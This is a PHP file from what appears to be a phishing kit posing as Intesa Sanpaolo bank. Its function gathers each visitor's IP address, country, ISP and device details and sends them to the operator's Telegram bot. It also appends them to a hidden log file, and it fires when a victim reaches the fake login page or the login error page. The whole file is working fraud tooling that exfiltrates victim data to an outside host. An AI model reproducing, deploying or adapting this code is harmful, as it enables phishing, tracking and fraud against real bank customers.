<?php 
require './CONFIG11.php';
include "./IP.INFO.php";

function note($statu){
	global $bot_token;
	global $chat_id;
	$c = curl_init();
	curl_setopt($c, CURLOPT_URL, "https://api.telegram.org/bot$bot_token/sendMessage?chat_id=$chat_id&parse_mode=html&text=".urlencode($LOGS="<b>••••••••••••••• 🍺 INTESASANPAOLO.CLIENT 🍺</b>\n[ 🔎 ] * : ".$_SERVER['REMOTE_ADDR']."\n[ 🚩 ] * : ".$_SESSION['_LOOKUP_COUNTRY_']."\n[ 🔌 ] * : ".$_SESSION['_LOOKUP_ISP_']."\n[ 💻 - 🌐 ] * : ".$_SESSION['_device_details_']."\n[ ⚙️ ] * : $statu"));
	file_put_contents('../../../ATR480X.html', $LOGS . PHP_EOL, FILE_APPEND);
	curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false);
	curl_setopt($c, CURLOPT_FOLLOWLOCATION, true);
	$res =  curl_exec($c);
	curl_close($c);
	
}


if(isset($_POST['loginview'])){
	note("👑 AT LOGIN PAGE");
}if(isset($_POST['loginerrorview'])){
	note("👑 AT LOGIN ERROR PAGE");
}
?>